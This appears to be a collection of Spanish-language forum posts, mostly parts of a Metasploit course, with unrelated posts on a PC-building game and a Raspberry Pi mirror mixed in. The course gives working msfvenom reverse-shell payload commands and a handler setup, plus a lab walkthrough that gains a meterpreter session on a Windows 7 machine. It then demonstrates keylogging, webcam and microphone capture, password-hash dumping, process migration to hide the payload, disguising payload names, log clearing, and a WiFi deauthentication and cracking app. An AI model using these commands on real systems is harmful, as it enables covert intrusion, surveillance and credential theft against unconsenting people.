Código: [Seleccionar]
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f <lenguaje>
Windows Based Shellcode
Código: [Seleccionar]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f <lenguaje>
Mac Based Shellcode
Código: [Seleccionar]
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f <lenguaje>

Handlers
Código: [Seleccionar]
use exploit/multi/handler
set PAYLOAD <Nombre del payload que ocupamos al general con el msfvenom>
set LHOST <Nuestra IP>
set LPORT <El puerto que seteamos>
exploit

Mas adelante lo veremos con mas detalles.



Como configurar una shell inverso durante la generación de un paylodad, Cuando generamos una shell inverso con msfvenom debemos saber las siguientes opciones importante. LHOST y LPORT.

LHOST - Esta es la dirección IP a la que desea que se conecte nuestra máquina de destino, En otra palabra nuestra dirección IP, recuerden que la víctima se tiene que conectar hacia nosotros.

LPORT - Este es el puerto al que se conectara la máquina de destino. Acá podemos poner cualquier puerto ojo que no se esté ocupando, para saber eso ocupe NMAP lo más común del puerto que se ocupa son como 443, 444, 445 como ejemplo.

Un puerto es un punto final a una conexión lógica y el medio por el que un programa cliente se comunica con un programa específico en una computadora en una red digamos que estas en una habitación lleno de puertas enumerado del 0 al 65536 y que cada puerta tiene un servicio único que como el puerto 80 que es web y si nosotros que LPORT ponemos 80 va a ver conflicto por que el 80 ya está ocupado. existen puertos ya asignado como la siguiente lista:

Puerto   Descripción
1   TCP Port Service Multiplexer (TCPMUX)
5   Remote Job Entry (RJE)
7   Protocolo Echo (Responde con eco a llamadas remotas)
9   Protocolo Discard (Elimina cualquier dato que recibe)
13   Daytime (Fecha y hora actuales)
17   Quote of the Day (Cita del Día)
18   Message Send Protocol (MSP)
19   Protocolo Chargen, Generador de caractéres
20   FTP — Datos
21   FTP — Control
22   SSH, scp, SFTP – Remote Login Protocol
23   Telnet
25   Simple Mail Transfer Protocol (SMTP)
29   MSG ICP
37   Time
42   Host Name Server (Nameserv)
43   WhoIs
49   Login Host Protocol (Login)
53   Domain Name System (DNS)
66   Oracle SQLNet
67   BOOTP (BootStrap Protocol) (Server), también usado por DHCP
68   BOOTP (BootStrap Protocol) (Client), también usado por DHCP
69   Trivial File Transfer Protocol (TFTP)
70   Gopher Services
79   Finger
80   HTTP
88   Agente de autenticación Kerberos
103   X.400 Standard
107   Remote Telnet Service
108   SNA Gateway Access Server
109   POP2
110   POP3
115   Simple File Transfer Protocol (SFTP)
118   SQL Services
119   Newsgroup (NNTP)
123   NTP
137   NetBIOS Name Service
138   NetBIOS Datagram Service
139   NetBIOS Session Service
143   Internet Message Access Protocol (IMAP)
156   SQL Server
161   SNMP
162   SNMP-trap
177   XDMCP (Protocolo de gestión de displays en X11)
179   Border Gateway Protocol (BGP)
190   Gateway Access Control Protocol (GACP)
194   Internet Relay Chat (IRC)
197   Directory Location Service (DLS)
209   Quick Mail Protocol
217   dBASE Unix
389   Lightweight Directory Access Protocol (LDAP)
396   Novell Netware over IP
443   HTTPS
444   Simple Network Paging Protocol (SNPP)
445   Microsoft-DS (Active Directory, compartición en Windows, gusano Sasser, Agobot)
458   Apple QuickTime
500   IPSec ISAKMP, Autoridad de Seguridad Local
512   exec
513   login
514   syslog usado para logs del sistema
515   Printer
520   RIP
522   Netmeeting
531   Conference
546   DHCP Client
547   DHCP Server
563   SNEWS
569   MSN
631   CUPS: sistema de impresión de Unix
666   identificación de Doom para jugar sobre TCP
992   Telnet SSL
993   IMAP4 SSL
995   POP3 SSL
1080   Socks Proxy
1352   IBM Lotus Notes/Domino RCP
1433   Microsoft-SQL-Server
1434   Microsoft-SQL-Monitor
1494   Citrix MetaFrame Cliente ICA
1512   WINS
1521   Oracle listener
1701   Enrutamiento y Acceso Remoto para VPN con L2TP
1723   Enrutamiento y Acceso Remoto para VPN con PPTP
1761   Novell Zenworks Remote Control utility
1863   MSN Messenger
2049   NFS
2082   CPanel
2086   WHM (Web Host Manager)
2427   Cisco MGCP
3000   Calista IP phone (saliente)
3030   NetPanzer
3128   Squid Proxy
3306   MySQL
3389   Microsoft Terminal Server
3396   Novell agente de impresión NDPS
3690   SubVersion
4099   AIM Talk
4662   eMule
4672   eMule
4899   RAdmin
5000   UPNP (Universal plug-and-play)
5060   SIP (Session Initiation Protocol)
5190   Calista IP phone (entrante)
5222   XMPP/Jabber: conexión de cliente
5223   XMPP/Jabber: puerto por defecto para conexiones de cliente SSL
5269   XMPP/Jabber: conexión de servidor
5432   PostgreSQL
5500   VNC (Virtual Network Computing)
5517   Setiqueue proyecto SETI@Home
5631   pcAnyWhere (host)
5632   pcAnyWhere (host)
5400   VNC (Virtual Network Computing)
5500   VNC (Virtual Network Computing)
5600   VNC (Virtual Network Computing)
5700   VNC (Virtual Network Computing)
5800   VNC (Virtual Network Computing)
5900   VNC (Virtual Network Computing)
6000   X11 usado para X-windows
6112   Blizzard Entertainment
6129   Dameware: Software conexión remota
6346   Gnutella
6347   Gnutella
6348   Gnutella
6349   Gnutella
6350   Gnutella
6355   Gnutella
6667   IRC
6881   BitTorrent: puerto por defecto
6891-6900   MSN Messenger (archivos)
6901   MSN Messenger (voz)
6969   BitTorrent: puerto de tracker
7100   Servidor de Fuentes X11
8000   Shoutcast
8080   HTTP alternativo al puerto 80. También Tomcat default
8118   privoxy
8291   routers Microtik
9009   Pichat peer-to-peer chat server
9898   Dabber (troyano)
10000   Webmin (Administración remota web)
12345   Netbus (troyano)
19226   Puerto de comunicaciones de Panda Agent
20000-20019   ICQ
28800-29000   MSN Game Zone
31337   Back Orifice (troyanos)



Ahora vamos a la práctica. en una red LAN.

Maquina atacante:

  • OS: Kali Linux
  • IP: 192.168.0.103

Maquina Victima:

  • OS: Windows 7 - 64 Bits
  • IP: 192.168.0.101
  • No tiene Anti-Virus "Con fines de hacer prueba"
  • Firewall deshabitado "Con fines de hacer prueba"

Ahora vamos a crear el payload, como es contra una maquina Windows tenemos que crear una payload con una extensión exe, entonces escribimos en la consola lo siguiente.

Código: [Seleccionar]
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Un puerto cualquiera> -f -o /root/paylodad.exe
en mi caso quedaría así

Código: [Seleccionar]
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f -o /root/payload.exe


al generar el payload se va a demorar un poco a sí que paciencia. cuando finalice podemos ver cuánto pesa el payload.


Opciones al momento de generar nuestro payload. Mas que nada un repaso.

-p | --payload: Se debe especificar el payload que se quiere utilizar, Para ver todos los payload que podemos crear escribimos en la consola msfvenom -l all



LHOST: Nuestra IP.

LPORT: El puerto que queremos que se conecte.

-f: es la extensión o formato en mi caso sería exe.

-o: Esta permite crear un archivo de salida más con el nosotros que deseamos crear nuestro payload.

Ahora una vez creado el paylodad tenemos que pasarlo a la maquina víctima. no ejecuten el payload todavía.

primero tenemos que ejecutar nuestro metasploit para ejecutar el módulo Handlers que nos permite es estar en modo escucha y listo a la espera cuando la maquina victima ejecute el payload.

Escribimos en la consola

Código: [Seleccionar]
msfconsole
y nos dirigimos al módulo Handlers

Código: [Seleccionar]
use exploit/multi/handler
Escribimos

Código: [Seleccionar]
show options
Para ver las opciones del módulo.



En la imagen de abajo no se ve muy clara entonces escriban "info" sin las comillas dentro del módulo.



Ahora tenemos que setear el modulo.

Código: [Seleccionar]
set PAYLOAD <Nombre del payload que creamos en msfvenom>
Código: [Seleccionar]
set LHOST <Nuestra IP>
Código: [Seleccionar]
set LPORT <El puerto que seteamos>
En mi caso quedara algo a así.

Código: [Seleccionar]
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Código: [Seleccionar]
set LHOST 192.168.0.103
Código: [Seleccionar]
set LPORT 4444
Escribimos

Código: [Seleccionar]
show opciones
Para ver nuestra si está todo bien seteados



acá tiene dos opciones ejecutar el payload primero el exe o ejecución handler por mi parte voy a ejecutar el payload primero.





Ahora ejecutamos el handler. con el comando:

Código: [Seleccionar]
exploit




Como pueden ver en la imagen conseguimos la shell y que nos abrió una sesión 1. y listo a si de simple.


Curso Metasploit - Part 1 - Hablemos sobre metasploit
Curso Metasploit - Part. 2.1 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 5 – Hablemos de msfvenom
Curso Metasploit - Part. 5.1 – Creando un paylodad basico


8


Hijacker es una interfaz gráfica de usuario para las herramientas de prueba de penetración Aircrack-ng, Airodump-ng, MDK3 y Reaver. Ofrece una interfaz de usuario simple y fácil para usar estas herramientas sin escribir comandos en una consola y copiar y pegar direcciones MAC.
Esta aplicación requiere un dispositivo Android ARM con un adaptador inalámbrico interno que admita el modo de monitor. Algunos dispositivos Android lo hacen, pero ninguno de ellos de forma nativa. Esto significa que necesitará un firmware personalizado. Cualquier dispositivo que use el conjunto de chips BCM4339 (MSM8974, como Nexus 5, Xperia Z1 / Z2, LG G2, LG G Flex, Samsung Galaxy Note 3) funcionará con Nexmon (que también es compatible con algunos otros conjuntos de chips). Los dispositivos que usan BCM4330 pueden usar bcmon.
Una alternativa sería usar un adaptador externo que admita el modo de monitor en Android con un cable OTG.
Las herramientas necesarias están incluidas para los dispositivos armv7l y aarch64 a partir de la versión 1.1. El controlador Nexmon y la utilidad de administración para BCM4339 y BCM4358 también están incluidos.
El acceso raíz también es necesario, ya que estas herramientas necesitan una raíz para funcionar.



Caracteristicas

Recopilación de información
  • Vea una lista de puntos de acceso y estaciones (clientes) a su alrededor (incluso los ocultos)
  • Ver la actividad de una red específica (midiendo beacons y paquetes de dato[/pre]s) y sus clientes
  • Estadísticas sobre puntos de acceso y estaciones
  • Consulte al fabricante de un dispositivo (AP o estación) desde la base de datos OUI
  • Vea la potencia de señal de los dispositivos y filtre los que están más cerca de usted
  • Guarde los paquetes capturados en el archivo .cap

Ataques
  • Desaauthenticar a todos los clientes de una red (ya sea para cada uno de ellos (efectivo) o sin un objetivo específico)
  • Desaauthenticar a un cliente específico de la red a la que está conectado
  • MDK3 Beacon Flooding con opciones personalizadas y lista SSID
  • DoS de Autenticación MDK3 para una red específica o para cada AP cercano
  • Capture un apretón de manos WPA o junte IV para romper una red WEP
  • Reaver WPS cracking (ataque de pixie-dust usando NetHunter chroot y adaptador externo)

Otro
  • Deja la aplicación ejecutándose en segundo plano, opcionalmente con una notificación
  • Copie comandos o direcciones MAC al portapapeles
  • Incluye las herramientas necesarias, sin necesidad de instalación manual
  • Incluye el controlador Nexmon, biblioteca requerida y utilidad de administración para dispositivos BCM4339 y BCM4358
  • Establecer comandos para habilitar y deshabilitar el modo de monitor automáticamente
  • Agrietar archivos .cap con una lista de palabras personalizada
  • Cree acciones personalizadas y ejecútelas fácilmente en un punto de acceso o cliente
  • Ordenar y filtrar puntos de acceso y estaciones con muchos parámetros
  • Exportar toda la información recopilada a un archivo
  • Agregue un alias persistente a un dispositivo (por MAC) para una identificación más fácil



Capturas de pantalla







Instalación

Asegurarse:
  • Estar en Android 5+
  • está rooteado (se requiere SuperSU, si está en CM / LineageOS instale SuperSU)
  • usted tiene un firmware para admitir el modo monitor en su interfaz inalámbrica






9
Hacking / Curso Metasploit - Part. 5 – Hablemos de msfvenom
« en: Abril 13, 2018, 08:26:49 pm »



En esta quinta aparte del curso estaré hablando sobre sobre msfvenom y sobre reverse shell para entender de como crear un payload con msfvenom, FatRat, SET y uno que otros RAT.



PAYLOADS: Este es un módulo que se encuentra en los distintos códigos que se ejecuta en el sistema explotando con existo y por cual obtienes un meterpreter como resultado final.

SHELLCODE: Se refiere a cualquier código de byte que pueda insertar en un exploit para lograr un objetivo particular. Shellcode es normalmente la carga útil de un exploit. Las instrucciones maliciosas proporcionan al atacante acceso de línea de comando a una computadora, todo ello con los privilegios del proceso que se explota. Normalmente el código de explotación está escrito en c o c++ por la mayoría sistema operativos que está escrita en esos lenguajes.



MSFVENOM: Es un generador de paylodad independiente de metasploit. Esta herramienta es una combinación de msfpayload y msfencode utilizar ambas herramientas en una única instancia. Msfvenom reemplazo tanto msfpayload como msfencode a partir del 8 de junio del 2015.

Ventajas de msfvenom:

-   Es potente ya que es una transformación de dos herramientas como msfencode y msfpayload.
-   Una mayor velocidad.
-   Y su facilidad de usar.

Tener en cuenta si buscan en internet “cómo crear un payload” es lo más probable que encuentren tutoriales antiguos que ocupan msfpayload y no msfvenom. No significa que no sirva el tutorial básicamente tiene que remplazar el msfpayload por msfvenom.



Antes de comenzar a utilizar msfvenom primero veremos sus opciones que trae. para eso escribimos en la consola
Código: [Seleccionar]
msfvenom -h


OPCIONES:

-p | --payload: Se debe especificar el payload que se quiere utilizar

-l  | -- list: Se debe especiar el tipo de módulos que se quiere listar, por ejemplos encoder, payloads, etc..

-n | --nopsled: Especificar el tamaño sobre el payload.

-f | --formal: Se debe especificar el formato de salida, por ejemplo, ejecutable, raw. Etc…

-e | --encoder: Especifica el encoder que se requiere utilizar, por ejemplo, x86/countdown. Esta función es idéntica en msfencode.

-a | --arch: Se especifica la arquitectura donde se ejecutará el payload.

-s | --space: Especifica el tamaño máximo que debe tener el payload.

-b| --bad-chars: Especifica el listado de caracteres que debe evitarse en la creación del payload, por ejemplo, para evitar los bye null x00

-i | --iterations: Especifica el número de iteraciones que ejecutara el encoder.

-k | --keep: Especifica que el payload se ejecutara en un thead. Este parámetro implementa la técnica de ejecutable con “plantilla personalizada sigilosa”

-x |--template: Especifica una planilla personalizable. Este parámetro implementa la técnica del ejecutable con plantilla personalizada.

-c | --add-code: Permite añadir un ejecutable personalizado.

-o | --options: Lista las opciones de los payloads.


Para dar un poco más de énfasis voy a explicar la opción “-l || --list” Nos muestra un listado de los módulos como encoders payloads etc…



Entonces si escribimos en la consola
Código: [Seleccionar]
msfvenom -l all nos mostrara todos los payload que existen, como payload para Android, IOS, Linux, Windows, etc… se lo digo porque uno cuando ven los tutoriales se quedan con eso y no explorar más a ya para sacarle todo el provecho de la herramienta y esto es una instancia de que exploren.


Curso Metasploit - Part 1 - Hablemos sobre metasploit
Curso Metasploit - Part. 2.1 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 5 – Hablemos de msfvenom


10



Esta es la segunda parte de las demostraciones de meterpreter.



idletime: Muestra el tiempo muerto o AFK de la maquina comprometida.



===========================================================================================

shell: El meterpreter se convierte en un cmd de Windows, En otras palabras más simples.



Para volver a meterpreter escribimos exit.

===========================================================================================

search: Buscar archivos o directorios. Si escribimos search -h nos aparece las opciones del comando search.



Para buscar un archivo agregamos la opcion -f de file. Si nosotros queremos buscar un archivo y si sabemos cual es su nombre como por ejemplo buscar un txt que tenga el nombre cuenta bancaria, entonces escribimos en metrepeter search -f cuenta bancaria.txt. y en caso si quieres buscar todos los archivos de una cierta extensión debemos remplazamos con un asterisco (*) el nombre del archivo ejemplo: search -f *.txt el asterisco en el mundo de la informática se deriva todo.



===========================================================================================

hashdump: No muestra los hashes del Sistema comprometido.



Como se puede apreciar el comando ha obtenido el hash correspondiente a los usuarios existentes en el sistema.

===========================================================================================

background: Tener la session actual en Segundo plano. En metasploit podemos tener muchas maquinas comprometida y esto se guardan en sesiones con una identificacion de números consecutivo 1.2.3.4. etc….  En forma más fácil de decir cuando nosotros ejecutamos background de una forma nos desconectamos de la maquina comprometida y volvimos a metasploit y nos podemos conectar con otra máquina infectada esta opción igual se ocupa cuando nosotros queremos subir de privilegios y a si podemos ejecutar exploit dentro de la sessiones.   



Como pueden ver en la imagen que volví a metasploit. Para ver todas la sesiones activas escribimos sessions



Como pueden ver tengo cuatros sesiones abiertas se repite por que ataque cuatras veces la misma maquina con el mismo payload estaba haciendo algunas pruebas de privilegio.

Y para ingresar una sesión que nos apetezca escribimos sessions -i (Numero de la session) Ejemplo quiero entrar en la sesión 3 escribo sessions -i 3



Y de forma inmediata a meterpreter.

 ===========================================================================================

kill: Con este comando Podemos matar un proceso, pero necesitamos saber el PPID y para eso tenemos que ejecutar ps, el PPID es el segundo número que nos aparece.



Quiero matar un proceso del TeamViewe que su PPID es 1072 entonces escribo kill 1072 y el proceso desaparece.



===========================================================================================

irb: Podemos interactuar una shell de ruby. Lo que nos permite usar el lenguaje de scripting ruby para interactuar con el sistema comprometido.

Código: [Seleccionar]
meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"Computer"=>"CARDINI-PC", "OS"=>"Windows 7 (Build 7601, Service Pack 1).", "Architecture"=>"x64", "BuildTuple"=>nil, "System Language"=>"es_ES", "Domain"=>"WORKGROUP", "Logged On Users"                                                =>2}
>> exit
meterpreter >

Para salir de la Shell escribimos exit.

===========================================================================================

quit: Vuelve a la consola Meterpreter y cierra la sesión activa.



Como pueden ver me mato el merpreter y cerró la sesión 3


Curso Metasploit - Part 1 - Hablemos sobre metasploit
Curso Metasploit - Part. 2.1 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 5 – Hablemos de msfvenom


11



En esta segunda parte mostrare el comando faltante. Y sus usos



keyscan : De forma práctica esto es un keylogger. Captura las pulsaciones del teclado. Este comando tiene 3 funciones.

keyscan_start: Activa el keylogger.
keyscan_stop: Para el keylogger.
keyscan_dump: Ver lo que se capturo.

Dejar en contagia que el comando dump no sirve si ustedes paran el kayscan.



===========================================================================================

12



Hoy le estaré enseñando a cómo funcionan algunos comandos de meterpreter, a comparación con el post anterior que eran definiciones.



sysinfo: Nos mostrara la información del sistema remoto como el sistema operativo, la arquitectura, lenguaje etc...



===========================================================================================

pwd: Este comando igual que en Linux permite saber en que carpeta o directorio nos encontramos.



===========================================================================================

ls: Ver en listados el contenido de los directorios, Es lo mismo que en linux.



===========================================================================================

ps: Muestra un listado de todos los proceso de la maquina comprometida.



===========================================================================================

migrate: Migra un procesos a otro. Cuando nosotros atacamos se crea un proceso que seria del payload bueno este proceso es visible para nuestra victima entonces si la maquina comprometida ve ese proceso podrá matar el proceso y también saber dónde está ubicado nuestro payload y borrarlo directamente por que el administrador de tarea tiene la opcion de ver el proceso y ir a la direccion del archivo. para evitar todo esto nosotros lo que hacemos es migrara el proceso del payload a otro por otro proceso como por ejemplo explore.exe que es un proceso que nunca se cierra.

OJO! migra el proceso no significa que van a finalizar el proceso que quieren migrar lo que realmente hace es camuflar el proceso a otro. como una fusión

Para dejar en claro al momento de buscar nuestro payload en el administrador de tarea es el mismo nombre que le damos a nuestro payload al momento de crearlo. Es decir, si yo creo un payload con el nombre payload a si mismo va a aparecer es el administrador de tarea de Windows, como sale en la imagen de abajo.  Acá se la pueden creanear “ingeniar” el nombre de su payload como adobe_flash o no se update Windows en caso de si que no migran o no puedan migrar.

Ese sería obviamente nuestro payload. Y a si se vería en administrador de tarea en Windows.



Bueno para ocupar el comando migrate nosotros debemos conocer el PID "Identificador de proceso" de nuestro payload en mi caso seria 2792 "Recuerden para saber el PID tienen que usar el comando ps"



Y lo voy a ocultar a otro proceso que nunca se cierran como por ejemplo Explore.exe en mi caso el PID del explore seria 1536



Entonces en meterpreter escribimos migrate más el PID al cual queremos ocultarnos migrate 1536



Y si escribimos ps payload.exe desaparece por que esta en Explore.exe

===========================================================================================

getpid: Muestra el PID del proceso en que estamos actualmente.



No dice que estoy en el proceso 1536 el que era Explore.exe cuando hice el ejemplo del migrate.

===========================================================================================

getuid: Nos indica en que usuarios estamos conectado. Con esto podemos ver nuestros privilegios.



Como se podra ver que no estamos como administrador.

===========================================================================================

webcam_list: Lista webcams, podemos ver si la maquina atacante tiene una webcam.



===========================================================================================

webcam_snap: Tome una foto de la cámara web especificada, Cuando ejecutamos el comando webcam_list cierto que no aparece un listado de las camaras que tiene nuestra victima enumerada entonces cuando ejecutamos webcam_snap tenemos que poner con que camara queremos sacar la en mi caso yo puse 1.


 
Y se genera un jpg y a la vez no dice donde esta ubicado. lo mismo podemos ocupar con el comando webcam_stream para grabar "video"

===========================================================================================

record_mic: Grabar el audio desde el microfono.



con el -d podemos darle cuantos segundos queremos grabar si queremos grabar una hora escribimos record_mic -d 3600

===========================================================================================

screenshot: Saca un pantallazo, con esto podemos ver lo que esta haciendo la victima.



===========================================================================================

shell: Ejecuta una shell de windows "CMD".



Con solo escribir "exit" para volver a meterpreter.

===========================================================================================

keyscan : De forma práctica esto es un keylogger. Captura las pulsaciones del teclado. Este comando tiene 3 funciones.

keyscan_start: Activa el keylogger.
keyscan_stop: Para el keylogger.
keyscan_dump: Ver lo que se capturo.

Dejar en contagia que el comando dump no sirve si ustedes paran el kayscan.



===========================================================================================

download: Descargar un archivo.

Es con solo escribir download mas el archivo con la extencion.




===========================================================================================

cat: El comando cat muestra el contenido de un archivo sin tener la nececidad de descargar el archivo para ver su contendio.



===========================================================================================

edit: Editar archivo. Podemos editar archivo, Escribimos edit mas la ruta con comillas





Curso Metasploit - Part 1 - Hablemos sobre metasploit
Curso Metasploit - Part. 2.1 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 5 – Hablemos de msfvenom


13


exactamente lo que su nombre ofrece y muy pronto estará disponible su primera versión pública en Steam.

Se trata de PC Building Simulator, un simulador que te permite ensayar y aprender como es ensamblar un tarro sin las complicaciones de que tu gato se entrometa ni el peligro de que tus dedos de mantequilla arruinen algo que no deberían. La aplicación te permite de manera virtual armar un PC desde cero y de manera bastante intuitiva.

Además de ello, el mismo juego incluye un "Modo de Carrera", donde tomarás el rol de un dueño de tienda reparadora de computadoras, con varios retos que te pondrán a prueba a la hora de ensamblar o arreglar tarros de diversas formas y tamaños.

Sumado a eso, una buena cantidad de marcas pretenden dar soporte oficial al simulador, introduciendo sus propias partes de PC de forma licenciada, para que puedas literalmente juguetear con el hardware original. Entre las empresas ya anunciadas a tener presencia estarán NZXT, Cooler Master, RAIJINTEK, MSI y EVGA.

PC Building Simulator llegará a Steam Early Access el próximo 27 de marzo. Si estás interesado, por mientras puedes descargar su prototipo gratuito en este enlace.





Fuente




14


En esta cuarta parte definiendo los comandos de meterpreter, En la parte 4.1 Estaré especificando los comandos más interesante de forma más profundas, Como por ejemplo de cómo cambiar de proceso, subir de privilegio ”administrador”, en que privilegio estamos, grabar la pantalla y tomar el control de los dispositivo "Mouse y teclado".

meterpreter: abreviatura de The Meta-Interpreter, es un payload avanzado que está incluido en Metasploit Framework. Básicamente permite a los usuarios controlar la pantalla de un dispositivo mediante VNC y navegar, cargar y descargar archivos etc..






Core Commands
=============

?: Como todo los "?" es el menú de ayuda que te muestra los comandos.
background: Ejecuta la sesión actual en segundo plano.
bgkill: Elimina una secuencia de comandos meterpreter de segundo plano.
bglist: Listas ejecutando scripts de fondo.
bgrun: Ejecuta un script meterpreter en segundo plano.
channel: Muestra las informaciones sobre canales activos.
close: Cierra un canal.
disable_unicode_encoding: Deshabilita la codificación de cadenas Unicode.
enable_unicode_encoding: Permite la codificación de cadenas Unicode.
exit: Termina la sesión de meterpreter.
help: Tiene la misma función igual que "?".
info: Muestra información sobre un módulo de publicación.
interact: Podemos iniciar el Interactiva Ruby Shell con el comando irb, lo que nos permite usar el lenguaje de scripting Ruby para interactuar con el sistema comprometido.
irb: Suelta al modo scripting irb.
load: Carga uno o más extensiones de meterpreter.
migrate: Migra el proceso. Cuando nosotros atacamos una maquina Windows se crea un proceso. Si la victima cierra el proceso nos desconectamos de la máquina. Entonces existe este comando para ocultarnos a otro proceso como a explorer.exe que nadie lo quita.
quit: Vuelve a la consola Meterpreter y cierra la sesión activa.
read: Lee datos de un canal.
resource: Ejecuta los comandos almacenados en un archivo.
run: Podemos ejecutar un script Meterpreter.
use: Para comandos y funcionalidades adicionales, podemos cargar extensiones Meterpreter con el comando use.
write: Escribe datos en un canal...



Stdapi: File system Commands
============================

cat: El comando cat muestra el contenido de un solo archivo.
cd: Cambiar de directorio.
download: Descargar un archivo o directorio.
edit: Editar archivo.
getlwd: Imprimir el directorio de trabajo local.
getwd: Imprimir el directorio de trabajo.
lcd: Cambiar el directorio de trabajo local.
lpwd: Imprimir el directorio de trabajo local.
ls: Ver los archivos del directorio.
mkdir: Crear directorio.
mv: Mover directorio.
pwd: Muestra el directorio de trabajo.
rm: Borrar un archivo específico.
rmdir: Eliminar directorio.
search: Buscar un archivo.
upload: Subir un archivo o directorio.



Stdapi: Networking Commands
===========================

arp: Mostrar el caché ARP de host
getproxy: Mostrar la configuración del proxy actual
ifconfig: Mostrar las interface de red.
ipconfig: Permite visualizar las IP "la misma información que Windows".
netstat: Mostrar las conexiones de red.
portfwd: Reenviar un puerto local a un servicio remoto.
route: Nos permite visualizar y modificar la tabla de enrutamiento.



Stdapi: System Commands
=======================

clearev: Limpia el log.
drop_token: Deje de hacerse pasar por el token actual.
execute: Ejecuta un comando.
getenv: Obtenga uno o más valores de variables de entorno
getpid: muestra el PID del proceso en que estamos actualmente.
getprivs: Nos permite obtener todos los privilegios de administración.
getuid: Nos indica en que usuarios estamos conectado. Con esto podemos ver nuestros privilegios.
kill: Termina un proceso.
ps: Muestra una lista de proceso de la maquina comprometida. Con su PID.
reboot: Reinicia el equipo víctima.
reg: Modificar e interactuar con el registro remoto. "regedit"
rev2self: Llama a RevertToSelf () en la máquina remota.
shell: Ejecuta una shell "CMD".
shutdown: Apaga la computadora.
steal_token: Robar las fichas disponibles para un determinado proceso y hacerse pasar por esa señal.
suspend: Suspende o reanuda una lista de procesos.
sysinfo: No mostrara la información del sistema remoto como el sistema operativo, la arquitectura, lenguaje etc... Igual se puede ocupar el comando "run get_env" detalla más información.



Stdapi: User interface Commands
===============================

enumdesktops: Permite consultar todas las sesiones (o escritorios).
getdesktop: Permiten obtener el desktop del usuario actual
idletime: Nos muestra el tiempo en que el usuario esta afk.
keyscan_dump: Volcar las teclas remotas capturadas en el objetivo.
keyscan_start: Comienza a capturar pulsaciones del teclado. "keylogger"
keyscan_stop:   Para la captura las pulsaciones del teclado.
screenshot: Saca pantallazo. "con esto podemos ver lo que está haciendo la maquina victima"
setdesktop: Mover a una estación de trabajo y escritorio diferente.
uictl: Este comando nos permite controlar algún dispositivo. Mouse, Teclado etc...



Stdapi: Webcam Commands
=======================

record_mic: Grabe audio desde el micrófono predeterminado por "X" segundos.
webcam_chat: Comienza un video chat.
webcam_list: Lista webcams.
webcam_snap: Tome una instantánea de la cámara web especificada.
webcam_stream: Reproduce una transmisión de video desde la cámara web especificada.



Priv: Elevate Commands
======================

getsystem: Intente elevar su privilegio al del sistema local.



Priv: Password database Commands
================================

hashdump: Volcar todos los hashes en el objetivo.



Priv: Timestomp Commands
========================

timestomp: Cambiar los atributos de un archivo específico.


Curso Metasploit - Part 1 - Hablemos sobre metasploit
Curso Metasploit - Part. 2.1 - Comandos de metasploit
Curso Metasploit - Part. 2.2 - Comandos de metasploit
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
Curso Metasploit - Part. 5 – Hablemos de msfvenom


15
Arduino - Raspberry PI / MagicMirror 2
« en: Enero 05, 2018, 11:06:56 pm »
Un "Magic Mirror" es un espejo que además de reflejarnos, permite también mostrar varias informaciones que nos pueden ayudar en el día a día como agenda, noticias, tránsito, estado del tiempo, entre muchas otras disponibles por la comunidad "Magic Mirror ".

¡Manos a la obra!



Materiales

Software:

Hardware:
  • Monitor TFT / LCD "La pulgada es a gusto"
  • Kit Raspberry Pi
  • Tarjeta de memoria de al menos 4 GB de capacidad.
  • Acrílico transparente "Las dimensiones es a gusto"
  • Película espejo de una vía "One Way Solar Reflective Mirror Sticker"



La Construcción:

Para empezar fue necesario abrir el monitor con las llaves de tornillo adecuadas y medir la pantalla del mismo. Para esta pantalla de 17 "las medidas son de 36 cm de altura y 29,5 cm de longitud. Utilizando estos datos, fue necesario cortar el acrílico y la película a medida. Una vez que el corte del acrílico es gratuito en la tienda donde fue adquirido, no recomiendo cortar en casa con una sierra de corte, pues va a romper el mismo. Para el corte de la película, fue necesario echar la pantalla sobre la misma y cortar con el X-acto alrededor de la pantalla.



